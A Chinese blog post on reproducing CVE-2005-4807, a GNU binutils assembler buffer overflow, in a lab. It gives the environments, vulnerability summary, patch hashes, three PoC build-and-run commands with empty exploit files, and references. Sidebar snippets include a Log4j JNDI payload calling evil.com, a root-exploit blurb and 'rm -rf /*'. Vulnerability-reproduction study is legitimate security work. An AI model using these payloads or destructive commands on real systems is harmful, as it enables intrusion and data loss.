CVE-2005-4807漏洞复现

最新推荐文章于 2024-07-25 15:50:18 发布
最新推荐文章于 2024-07-25 15:50:18 发布
阅读量159 收藏
点赞数
文章标签: linux ubuntu 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52355463/article/details/130764700
版权

靶机环境

  1. 操作系统基本信息

        OS:ubuntu 16.04

        64/32:32

  1. 漏洞软件安装

        系统自带

攻击机环境

  1. 操作系统基本信息

        OS:ubuntu 16.04

        64/32:64

  1. 相关软件安装

        Python

漏洞相关

        1.漏洞编号:CVE-2005-4807

        2.影响软件:GNU BinUtils

        受影响版本:GNU BinUtils version 2.1X

        实验版本:GNU BinUtils version 2.12

        受影响软件简介:Binutils 是二进制实用程序的集合,包括 ar(用于创建、修改和从档案中提取),作为(GNU 系列汇编程序)、gprof(用于显示调用图配置文件数据)、ld(GNU 链接器)、nm(用于从目标文件中列出符号)、objcopy(用于复制和翻译目标文件),objdump(用于显示来自目标文件的信息),ranlib(用于生成索引存档的内容),readelf(用于显示详细信息有关二进制文件的信息),大小(用于列出部分大小对象或存档文件)、字符串(用于列出可打印字符串来自文件)、strip(用于丢弃符号)和 addr2line(用于将地址转换为文件和行)。

        3.漏洞原理

        GNU binutils GAS(GNU汇编程序)容易出现缓冲区溢出漏洞,因为它无法在复制到大小不足的内存缓冲区之前正确地边界检查用户提供的输入。

        4.利用原理

        远程攻击者可能会使应用程序崩溃,或在应用程序的上下文中执行任意的机器代码。

        5.补丁信息

  1. Mandriva Linux 2006.0:
    a514aef8f0aae8017c36c6373c546f1f 2006.0/RPMS/binutils-2.16.91.0.2-3.1.20060mdk.i586.rpm
    608c036f1cf3604f70254d834a1be68c 2006.0/RPMS/libbinutils2-2.16.91.0.2-3.1.20060mdk.i586.rpm
    3b215ae344eecd901ac81bc72d313dbb 2006.0/RPMS/libbinutils2-devel-2.16.91.0.2-3.1.20060mdk.i586.rpm
    cd7e83cac0c468d104c10b402bb21a53 2006.0/SRPMS/binutils-2.16.91.0.2-3.1.20060mdk.src.rpm
  2. Mandriva Linux 2006.0/X86_64:
    e52fa90704f954868c4619119e8e833d x86_64/2006.0/RPMS/binutils-2.16.91.0.2-3.1.20060mdk.x86_64.rpm
    1117083b22061902fe40d87c1d7b9c22 x86_64/2006.0/RPMS/lib64binutils2-2.16.91.0.2-3.1.20060mdk.x86_64.rpm
    6ff27559c550109d9843e034181a0fa4 x86_64/2006.0/RPMS/lib64binutils2-devel-2.16.91.0.2-3.1.20060mdk.x86_64.rpm
    cd7e83cac0c468d104c10b402bb21a53 x86_64/2006.0/SRPMS/binutils-2.16.91.0.2-3.1.20060mdk.src.rpm
  3. Corporate 3.0:
    84f8aea5d202ba206ca31871047d8a5f corporate/3.0/RPMS/binutils-2.14.90.0.7-2.3.C30mdk.i586.rpm
    d72ede02c6410aad9ec98bfc931f2b2b corporate/3.0/RPMS/libbinutils2-2.14.90.0.7-2.3.C30mdk.i586.rpm
    647d07675b4eabfa2cfe8933342cf46d corporate/3.0/RPMS/libbinutils2-devel-2.14.90.0.7-2.3.C30mdk.i586.rpm
    a0f5c767dcb258960cb0b9004e6f73d3 corporate/3.0/SRPMS/binutils-2.14.90.0.7-2.3.C30mdk.src.rpm
  4. Corporate 3.0/X86_64:
    54d559b890d485b7979446499b8dad5a x86_64/corporate/3.0/RPMS/binutils-2.14.90.0.7-2.3.C30mdk.x86_64.rpm
    35f8cf549a5a8222e933b150775efdee x86_64/corporate/3.0/RPMS/lib64binutils2-2.14.90.0.7-2.3.C30mdk.x86_64.rpm
    0df49c77c9bf02a1b3686387580ad7e3 x86_64/corporate/3.0/RPMS/lib64binutils2-devel-2.14.90.0.7-2.3.C30mdk.x86_64.rpm
    a0f5c767dcb258960cb0b9004e6f73d3 x86_64/corporate/3.0/SRPMS/binutils-2.14.90.0.7-2.3.C30mdk.src.rpm

工具相关

        1. 工具开发组织:无

        2. 工具所属平台:无

        3.工具形式:二进制

        4.命令参数及功能:无

工具使用

exploit.c

 

exploit.s

 

gas_poc.sh

 

sh gas_poc.sh > exploit.c

gcc -S -o exploit.s exploit.c

./binutils-2.12/gas/as-new exploit.s

 

参考链接

[1] https://www.exploit-db.com/exploits/28397

[2] https://ubuntu.com/security/notices/USN-336-1

[3] https://bugs.gentoo.org/99464

[4] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4807

[5] https://bugtraq.securityfocus.com/detail/E1GHuNQ-00088J-Iz

[6] https://github.com/VulnReproduction/LinuxFlaw/tree/master/CVE-2005-4807

杯酒渐浓blank
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
漏洞通告】CVE-2022-34870 Apache Geode跨站脚本漏洞
热爱学习,喜欢折腾!
10-25 342
10月24日,Apache发布安全公告,修复了Apache Geode中的一个跨站脚本漏洞CVE-2022-34870)。在使用Pulse web应用程序查看区域条目时,Apache Geode 1.15.0及之前的版本中存在跨站脚本(XSS)漏洞,可能导致敏感信息泄露或恶意操作。Apache Geode 是一个数据管理平台,可在广泛分布的云架构中提供对数据密集型应用程序的实时、一致的访问。
Nginx 文件名逻辑漏洞 CVE-2013-4547 漏洞复现
ADummy的博客
02-25 278
Nginx 文件名逻辑漏洞CVE-2013-4547) by ADummy 0x00利用路线 ​ 上传文件后边空格—>上传文件成功—>php文件被成功解析 0x01漏洞介绍 ​ 这个漏洞其实和代码执行没有太大的关系,主要原因是错误地解析了请求的URL,错误地获取到用户请求的文件名,导致出现权限绕过、代码执行的连带影响。 影响版本 Nginx 0.8.41 ~ 1.4.3 Nginx 1.5.0 ~ 1.5.7 0x02漏洞复现 ​ 这个漏洞其实和代码执行没有太大关系,其主要
Nginx 文件名逻辑漏洞CVE-2013-4547)分析
灰太的表格的博客
06-06 217
Nginx 文件名逻辑漏洞CVE-2013-4547) 影响版本:Nginx 0.8.41 ~ 1.4.3 / 1.5.0 ~ 1.5.7 漏洞原理: 这个漏洞其实和代码执行没有太大关系,其主要原因是错误地解析了请求的URI,错误地获取到用户请求的文件名,导致出现权限绕过、代码执行的连带影响。举个例子,比如,Nginx匹配到.php结尾的请求,就发送给fastcgi进行解析,常见的写法如下: location ~ \.php$ { include fastcgi_params;
漏洞复现CVE-2013-4547
Blood_Pupil的博客
03-15 5233
CVE-2013-4547是Nginx中间件的一个文件名解析漏洞 漏洞原理 【注:下文中[]表示字节】 以vulnhub提供的漏洞环境为例,我们首先看一下前端页面 再看一下后端的过滤 目前的情况看来我们不能传后缀名为php这一类的文件,那么我们就把文件后缀名改为jpg吧,然后上传 我们尝试访问下 看来上传成功了,我们得想办法执行,nginx不是把所有后缀名为php的文件交给fastcgi...
CVE-2023-33246 RCE漏洞复现
七堇年的博客
06-08 1998
在RocketMQ 5.1.0及以下版本在一定条件下,会存在远程命令执行风险;由于RocketMQ的NameServer、Broker、Controller等多个组件暴露在外网且缺乏权限验证,攻击者可以利用该漏洞利用更新配置功能以RocketMQ运行的系统用户身份执行命令。此外攻击者还可以通过伪造 RocketMQ 协议内容来达到同样的效果。
CVE-2017-12629 xxe漏洞复现
xinyue9966的博客
03-21 1113
一、实验介绍 1.漏洞介绍 Apache Solr 是一个开源的搜索服务器。Solr 使用 Java 语言开发,主要基于 HTTP 和 Apache Lucene 实现。原理大致是文档通过Http利用XML加到一个搜索集合中。查询该集合也是通过 http收到一个XML/JSON响应来实现。此次7.1.0之前版本总共爆出两个漏洞:XML实体扩展漏洞(XXE)和远程命令执行漏洞(RCE)。 2.影响版本 Apache Solr before 7.1 with Apache Lucene before 7.1 E
CVE-2021-44228漏洞复现
m0_65764670的博客
05-29 1331
漏洞为log4j2漏洞,log4j2是java语言的日志处理套件,使用很广泛。在2.0到2.14.1版本中存在JNDI注入漏洞,攻击者在可以控制日志内容的情况下,通过传入类似'${jndi:ldap://evil.com/example}'​的参数进行JNDI注入,执行任意代码(注:Java环境1.8也可能会存在)什么是JNDI?
CVE-2016-2183漏洞复现
网络战争的博客
09-06 2055
CVE-2016-2183是OpenSSL库中的一个漏洞,它影响了所有版本的OpenSSL 1.0.2之前,包括1.0.1和1.0.0版本。其中,`-cert`参数指定服务器证书,`-key`参数指定服务器密钥,`-accept`参数指定服务端口号,`-www`参数表示启用HTTP服务器。建议用户及时更新OpenSSL版本来修复该漏洞。其中,`-connect`参数指定要连接的主机和端口号,`-cipher`参数指定使用的密码套件。在此过程中,您需要设置一些证书相关的信息,如国家、地区、组织等。
CVE-2021-41773 漏洞复现
Jay17的博客
07-13 714
CVE-2021-41773 漏洞复现
CVE-2019-0708 漏洞复现
qq_40860153的博客
05-11 451
存在漏洞的远程桌面服务器,在接收到特殊数据包时会释放一个内部信道 MS_T120 的控制结构体,但并未将指向该结构体的指针删除,而且在远程桌面连接结束之后还会调用 MS_T120 结构体内的一个函数指针,若攻击者可通过远程发送数据重新占据被释放的 MS_T120,并为结构体内的函数指针赋恰当的值,即可实现远程命令执行。4、可以看到攻击完成,但是没有成功创建会话,通过分析告警提示,是需要指定一下目标攻击框架,这里再设置一下攻击框架,再发起攻击就可以成功获取到会话了。攻击机:192.168.0.1。
exploit (Linux 内核CVE-2024-1086漏洞复现脚本)
06-06
Linux 内核CVE-2024-1086漏洞复现脚本。 在普通用户下,将文件上传后,chmod 777 exploit ,然后运行 ./exploit ,提权成功,输入id,可看到已经是root权限 。
Linux玩转指南
qq_43535970的博客
07-25 843
Linux是一个类Unix操作系统,最初由Linus Torvalds于1991年发布。它是基于开源的内核,并结合了大量的开源软件,形成了完整的操作系统。Linux的设计理念强调开源和自由,使得它在全球范围内得到广泛应用,从个人电脑到服务器、嵌入式系统,甚至超级计算机。
linux】Shell脚本三剑客之grep和egrep命令的详细用法攻略
景天科技苑
07-25 4471
Linux和Unix系统中,grep(Global Regular Expression Print)是一个非常强大的文本搜索工具,能够根据用户指定的模式(由正则表达式和文本字符组合而成)对目标文件进行逐行搜索,并显示匹配到的行。而egrep(Extended Grep)则是`grep`的扩展版本,支持更多的正则表达式语法。尽管egrep在较新的系统中被`grep -E`选项所取代,但了解其用法对于理解和使用正则表达式仍然具有重要意义。
Linux初学基本命令
最新发布
yuan20010401的博客
07-25 630
1、rm 文件名称 删除多个文件多个目录需要用空格 删除根目录(rm -rf /*)1、touch 文件名字 用于linux创建文件 创建多个目录需要用空格隔开。2、mkdir 目录名称 用于创建文件夹 创建多个嵌套文件夹需要用/隔开。1、cp 当前文件 其他目录名称 拷贝文件夹需要在最后 -r。退出不保存时按Esc+:q!1、ls 查看当前目录下面的文件或者文件夹。2、more 文件名称 查看文件更多内容。1、mv 原文件路径 目标文件路径。退出保存时按Esc + :wq。
Linux 常用命令分类及示例
简介
07-25 935
【代码】Linux 常用命令分类及示例。
cve-2017-7504漏洞复现
08-23
您好!对于CVE-2017-7504漏洞复现,请注意以下几个步骤: 1. 确认受影响的软件版本:CVE-2017-7504是一个Apache Struts 2框架中的远程代码执行漏洞。在复现之前,请确保目标系统运行的是受影响的Apache Struts 2版本。 2. 搭建相应的环境:您可以在漏洞复现环境中使用Apache Struts 2漏洞测试框架,例如Metasploit或其他可用的漏洞测试工具。 3. 指定目标URL:使用合适的工具,指定目标URL以进行漏洞利用。通常,您需要提供目标系统上受影响的Struts 2应用程序的URL。 4. 发起攻击:使用漏洞利用工具执行相应的攻击代码。具体的攻击方法取决于您使用的工具和漏洞利用脚本。 请注意,漏洞复现属于未经授权的活动,可能违反法律法规,因此我们强烈建议仅在合法授权和合规测试范围内进行漏洞复现。此外,对于未经授权或非法目的使用该漏洞进行攻击是违法行为,且可能导致严重后果。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值